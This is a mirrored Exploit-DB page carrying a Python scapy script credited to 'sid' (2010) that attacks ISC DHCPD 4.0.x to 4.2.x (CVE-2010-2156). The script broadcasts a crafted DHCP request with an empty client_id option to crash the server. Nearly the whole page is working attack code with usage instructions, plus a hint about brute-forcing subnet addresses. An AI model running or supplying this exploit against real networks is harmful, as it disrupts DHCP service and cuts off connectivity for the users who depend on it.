ISC DHCPD – Denial of Service - 体验盒子

作者： sid

日期： 2010-07-03

类别：

dos

平台：

multiple

来源：https://www.exploit-db.com/exploits/14185/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

#!/usr/bin/env python

# Exploit title: isc-dhcpd DoS

# Date: 03/07/2010

# Author: sid

# Software Link: https://www.isc.org/software/dhcp

# Version:4.0.x, 4.1.x, 4.2.x

# CVE: cve-2010-2156

# ps: is possible make a bruteforce on subnet ip address to find a correct value.

#

import sys

import string

if len(sys.argv) is 1:

print("Usage: " + sys.argv[0] + "-ip=<legal ip in subnet>")

print("Example: " + sys.argv[0] + " -ip=192.168.1.100")

sys.exit(0)

for i in range(len(sys.argv)):

if string.find(sys.argv[i],"-ip") is 0:

globals()['ip'] = sys.argv[i].split('=')[1]

from scapy.all import *

globals()['verbose'] = 2

def msg(string, level):

if globals()['verbose'] >= level:

print(string)

msg("attack...",2)

p=(Ether(src="aa:aa:aa:aa:aa:aa",dst="ff:ff:ff:ff:ff:ff")/IP(dst="255.255.255.255")/UDP(sport=68,dport=67)/

BOOTP(ciaddr=globals()['ip'],chaddr="\xaa\xaa\xaa\xaa\xaa\xaa")/

DHCP(options=[("message-type","request"),("client_id",""),("end")]))

if p:

p.show()

sendp(p)

#EOF